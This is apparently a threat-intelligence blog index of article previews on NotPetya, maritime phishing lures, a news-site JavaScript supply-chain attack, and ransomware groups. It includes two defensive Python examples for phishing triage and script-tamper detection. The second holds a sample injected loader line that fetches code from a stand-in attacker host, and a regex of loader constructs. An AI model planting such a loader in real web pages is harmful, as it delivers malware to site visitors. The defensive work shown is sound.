All Articles (1933)


The ramifications of the 2017 NotPetya attack, which the US government attributed to a Russian cyber-attack on Ukraine, continue to be felt worldwide: cyber insurers are now modifying coverage exclusions, expanding the definition of such attacks as an "act of war."  This 5-year-old cyber-attack appears to be turning the insurance industry on its head.

Mondelez International, parent of such popular brands as Cadbury, Oreo, Ritz, and Triscuit, was hit hard by NotPetya, with fa


Red Sky Alliance regularly queries our backend databases to identify all new data containing Motor Vessel (MV) or Motor Tanker (MT) in the subject line of malicious emails.  Malicious actors use emails with MV or MT in the subject line as a lure to entice users in the maritime industry to open emails containing malicious attachments.  Red Sky Alliance is providing this list of Motor Vessels in which we directly observed the vessel being impersonated, with assoc
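The lure described above is a subject-line pattern, so it can be triaged mechanically before a user ever sees the message. The following is an added example, not Red Sky Alliance's own tooling: it extracts the impersonated vessel name from a subject, refuses to match "MT" or "MV" embedded in other words, and combines the lure with two further signals (a risky attachment type and a sender domain outside a partner allow-list). The sample subjects, the partner domain and the attachment names are constructed for illustration.

```python
import os
import re
from typing import List, Optional, Tuple

# Matches "MV NAME", "MT NAME", "M/V NAME" or "M/T NAME" where NAME is one to
# four upper-case tokens. The required whitespace after the prefix keeps words
# such as "MTA" or "MVP" from matching.
VESSEL_RE = re.compile(
    r"\b(M/?[VT])\s+([A-Z][A-Z0-9\-']*(?:\s+[A-Z][A-Z0-9\-']*){0,3})\b"
)

# Upper-case tokens that commonly follow a vessel name but are not part of it.
STOPWORDS = {"ETA", "ETD", "RE", "FW", "FWD", "URGENT", "PDA", "FDA"}

# Attachment types that frequently carry the malicious payload in these lures.
RISKY_EXTENSIONS = {".iso", ".img", ".zip", ".rar", ".7z", ".html", ".htm",
                    ".js", ".exe", ".lnk", ".docm", ".xlsm"}

# Hypothetical allow-list of domains the recipient already does business with.
KNOWN_PARTNERS = {"example-shipping.test"}

# Constructed sample subjects (not taken from any real dataset).
SAMPLE_SUBJECTS = [
    "RE: MV OCEAN PRIDE - Port Agency Appointment & Disbursement Account",
    "MT SILVER WAVE / Bunker Delivery Note",
    "Quarterly newsletter from the MTA",
    "Meeting moved to 3 PM",
    "FW: M/V BLUE HORIZON ETA Update - Documents attached",
]


def extract_vessel_lure(subject: str) -> Optional[Tuple[str, str]]:
    """Return (prefix, vessel name) if the subject carries an MV/MT lure."""
    m = VESSEL_RE.search(subject)
    if not m:
        return None
    prefix = m.group(1).replace("/", "")          # normalise M/V -> MV
    tokens = []
    for tok in m.group(2).split():
        if tok in STOPWORDS:                       # "ETA" ends the name
            break
        tokens.append(tok)
    if not tokens:
        return None
    return prefix, " ".join(tokens)


def score_message(subject: str, sender_domain: str,
                  attachments: List[str]) -> Tuple[int, List[str]]:
    """Count independent risk signals; the vessel lure is the trigger."""
    lure = extract_vessel_lure(subject)
    if lure is None:
        return 0, []
    reasons = [f"vessel lure: {lure[0]} {lure[1]}"]
    risky = [a for a in attachments
             if os.path.splitext(a.lower())[1] in RISKY_EXTENSIONS]
    if risky:
        reasons.append("risky attachment type: " + ", ".join(risky))
    if sender_domain.lower() not in KNOWN_PARTNERS:
        reasons.append(f"sender domain not an established partner: {sender_domain}")
    return len(reasons), reasons


def triage(subjects: List[str]) -> List[Tuple[str, Tuple[str, str]]]:
    """Return only the subjects that carry a vessel lure, with the name found."""
    hits = []
    for s in subjects:
        lure = extract_vessel_lure(s)
        if lure:
            hits.append((s, lure))
    return hits


if __name__ == "__main__":
    for subject, lure in triage(SAMPLE_SUBJECTS):
        print(f"{lure[0]} {lure[1]!r:<20} <- {subject}")
    print(score_message(SAMPLE_SUBJECTS[0], "mail.example.invalid",
                        ["Disbursement_Account.iso"]))
```

The subject match alone is only a lure indicator: legitimate agency and charterer traffic uses the same MV/MT convention, so the score is what should drive quarantine, and the extracted vessel name is what to compare against a watch-list such as the one this article provides.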

Activity Summary - Week Ending on 10 November 2022:

  • Red Sky Alliance identified 23,574 connections from new IPs checking in with our Sinkholes
  • Timeweb[.]ru hit 251x – for the 2nd Week
  • Analysts identified 1,762 new IP addresses participating in various Botnets
  • Patching is Very Important
  • Microsoft Patch Tuesday
  • YouTube - You’re Not Helping
  • Vidar stealer
  • Stolen Data in Australia
  • Lloyd’s of London
  • School System Stands its Ground
  • Oil & Gas - ABBs

Link to full report: IR-22-313-001_weekly313.pdf

Hundreds of regional and national news websites in the United States are delivering malware because of a supply chain attack involving one of their service providers.  Cybersecurity researchers reported on 02 November 2022 that a threat actor they track as TA569 appears to be behind the attack.  The hackers have targeted an unnamed media company that serves many news outlets in the US.

The service provider delivers content to its partners via a JavaScript file.  The attacker modified the noted cod
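A partner site that loads a provider's JavaScript has two defensive options for the tampering described above: pin the file with Subresource Integrity (SRI) so the browser refuses a modified copy, and monitor what the provider actually serves so a change is noticed rather than silently executed. The following is an added example, not code from the affected provider or from the researchers who reported the campaign. The "known-good" script, the tampered copy and the injection markers are constructed for illustration; a real monitor would fetch the live file and diff it against a stored baseline.

```python
import base64
import hashlib
import hmac
import re
from typing import List, Tuple

# Constructed sample: a hypothetical known-good partner script ...
BASELINE_JS = b"""(function(){
  var c = document.getElementById('partner-content');
  c.innerHTML = '<p>Headline feed</p>';
})();
"""

# ... and a tampered copy that appends a loader for a second-stage script.
TAMPERED_JS = BASELINE_JS + b"""var s=document.createElement('script');
s.src='https://bad.example.invalid/update.js';document.head.appendChild(s);
"""

# Constructs that rarely appear in a content-delivery script but are typical
# of injected loaders. Tune to the provider's real code before deploying.
INJECTION_MARKERS = re.compile(
    rb"createElement\(['\"]script|eval\(|atob\(|document\.write\(|unescape\("
)

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Build the value for an <script integrity="..."> attribute."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content: bytes, expected: str) -> bool:
    """Check served content against a pinned SRI value (constant-time compare)."""
    algo = expected.split("-", 1)[0]
    if algo not in SRI_ALGORITHMS:
        return False
    return hmac.compare_digest(sri_hash(content, algo), expected)


def new_suspicious_lines(baseline: bytes, candidate: bytes) -> List[bytes]:
    """Lines present in the served copy but not in the baseline that look like a loader."""
    known = set(baseline.splitlines())
    return [ln for ln in candidate.splitlines()
            if ln not in known and INJECTION_MARKERS.search(ln)]


def check_partner_script(served: bytes, pinned: str,
                         baseline: bytes = BASELINE_JS) -> Tuple[str, List[bytes]]:
    """Return ("ok", []) when the pin holds, else ("changed", suspicious new lines)."""
    if verify_sri(served, pinned):
        return "ok", []
    return "changed", new_suspicious_lines(baseline, served)


if __name__ == "__main__":
    pinned = sri_hash(BASELINE_JS)
    print('<script src="https://provider.example.invalid/feed.js" '
          f'integrity="{pinned}" crossorigin="anonymous"></script>')
    print(check_partner_script(BASELINE_JS, pinned))
    print(check_partner_script(TAMPERED_JS, pinned))
```

SRI only works when the provider publishes a fixed file and coordinates hash updates with its partners; a script that is regenerated per request cannot be pinned, which is why the server-side monitor that diffs the served file against a baseline is the fallback, and why a drift alert should be treated as an incident until the provider confirms the change.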

Impending doom looked foreseeable with Elon Musk’s $44 billion acquisition of Twitter and began to show early on, even before the billionaire completed his purchase.  From the daily tit-for-tat on his Twitter acquisition stance, it became apparent to some that Musk’s indecisive nature foretold an ominous future for Twitter.  However, the actual chaos ensued just hours after Musk became the largest stakeholder in the bird app.  From his plan to grant a “blue tick” verification symbol to anyon

The internet opened the door to a realm of possibilities that permanently changed the business and social landscape and our personal lives.  Most users are no longer restricted to dial-up; many of us now consider access to a stable internet connection a critical aspect of our daily lives.  We pay our bills online, check our bank statements, communicate via email, and maintain a presence on social media.  Many users rely on the web for work and entertainment, and seeking out information through

According to a new report published by cybersecurity firm Group-IB, a French-speaking cybercrime group may have stolen more than $30 million from banks and other types of organizations in recent years.  The threat actor has been named Opera1er.  Some of its activities were previously investigated by others, who have named it Common Raven, Desktop-Group, and NXSMS.

The cyber threat investigators are aware of 30 successful attacks between 2019 and 2021. In many cases, the same victim was attacked

Robots are taking over the world.  According to Oxford Economics, there will be 14 million robots in China by 2030 and 20 million worldwide.  In the USA, robots will modify or replace 1.5 million job positions.  Labor shortages due to the COVID-19 pandemic encouraged both manufacturers and warehouse companies to partner with robotics companies to optimize human and robot collaboration.  We have already seen robots build robots; what is next?

Now enter the engineers from Google, they have unveile

The US Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are raising awareness of the potential threat posed by attempts to manipulate information or spread disinformation in the lead-up to and after the 2022 midterm elections.  Foreign actors may intensify efforts to influence the outcomes of the 2022 midterm elections by circulating or amplifying reports of real or alleged malicious cyber activity on election infrastructure.  Additionally, th

A recent cyber-attack caused the trains operated by Denmark’s largest train service, DSB, to come to a halt.  Threat actors hit a third-party IT service provider associated with DSB, which slammed the brakes on rail service.  The cyber-attack hit the Danish company Supeo, an IT service that provides enterprise asset management solutions to railway companies, transportation infrastructure operators and public passenger authorities.  DSB is the largest train operating company in Denmark.[1]

“Trains throughout th

Activity Summary - Week Ending on 4 November 2022:

  • Red Sky Alliance identified 20,715 connections from new IPs checking in with our Sinkholes
  • Timeweb[.]ru hit 204x
  • Analysts identified 1,260 new IP addresses participating in various Botnets
  • ShadowPad
  • DramaQq
  • British Cyber Spies
  • Small Business Cyber Security
  • German Copper
  • Star Gazing stopped in Chile
  • French Defense Firm Attack
  • Can You Remember?

Link to full report: IR-22-307-001_weekly308.pdf

Red Sky Alliance maintains a substantial dark web collections data set, and we make this data available to our customers through our CTAC, RedXray, and API products.  This gives customers the opportunity to explore and perform analyses on dark web data without the need to establish a safe infrastructure for navigating the Tor network.  To date we have collected over 1.4 million data points across 80 dark web sites.  The set of sites that we collect from on an ongoing basis will change with ne

A Ukrainian man has been charged with computer fraud for allegedly infecting millions of computers with malware in a cybercrime operation known as "Raccoon Infostealer," the US Justice Department (DOJ) said on 25 October 2022.  Mark Sokolovsky, 26, is being held in the Netherlands and the US is seeking his extradition, the DOJ said in a statement.

It said Raccoon Stealer malware was leased to cybercriminals for $200 a month, payable in cryptocurrency.  The malware was then installed on the computer

ShadowPad is a modular malware platform privately shared with multiple PRC-linked threat actors since 2015.  According to SentinelOne, ShadowPad is highly likely the successor to PlugX.  Due to its prevalence in the cyber espionage field, the VMware Threat Analysis Unit (TAU) was motivated to analyze the command and control (C2) protocol in order to discover active ShadowPad C2s on the Internet.  C2 Protocol: ShadowPad supports six C2 protocols: TCP, SSL, HTTP, HTTPS, UDP, and DNS.  In this research[1]

Over two and a half years, a Russian-speaking ransomware group named OldGremlin has been attributed with 16 malicious campaigns aimed at entities operating in the transcontinental Eurasian nation.  The group's victims include companies in logistics, industry, insurance, retail, real estate, software development, banking, and arms manufacturing.

OldGremlin is using custom backdoors (TinyPosh and TinyNode) and ransomware (TinyCrypt, a.k.a decr1pt) along with third-party software for reconnaissance a

The FBI released an alert last week warning of hack-and-leak operations targeting organizations in the US and Israel by a group based in Iran.  The alert centers on Emennet Pasargad, an Iranian company US law enforcement agencies have previously spotlighted for its role in efforts to interfere with the 2020 US presidential election.  Last week, the FBI said the company, which has changed its name several times to avoid sanctions, has targeted entities in Israel since 2020 with attacks that invol

The White House has begun its second annual International Counter Ransomware Summit, in which Biden administration officials will convene with representatives of three dozen nations, the EU, and private business to discuss the growing threat posed by data-destroying cyberattacks.  President Biden will not be attending the meetings.

According to administration officials previewing the summit over the weekend, the two-day event will focus on priorities like improving system resilience and developing

Cyber threat actors are using a never-before-seen technique to stealthily infect victims with malware by abusing legitimate tools.  The campaign has been detailed by cybersecurity researchers, who say that the attackers can spend more than 18 months inside victims' networks while taking steps to keep their activity under the radar, in what is thought to be an intelligence-gathering and espionage operation.

How the attack begins is still uncertain, but victims beco

The US Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) have issued a joint alert on a new cybercrime group targeting organizations in the healthcare sector.

Called Daixin Team, the threat actor has been active since at least June 2022, targeting organizations in the US with ransomware built on the Babuk source code that leaked in September 2021, and also engaging in data theft and extortion.  It has

Most businesses are surprised by how long a single cyberattack can take to carry out, from beginning to end.  With the average dwell time of an intruder in an IT ecosystem now exceeding nine months, it is worth asking why malicious actors seem to be given the luxury of time.

To better understand how this all works, here is a brief review of the five stages of a cyberattack.

  1. Getting to know the victim: Adversaries start by identifying target organizations and collecting information about them. Key focuses i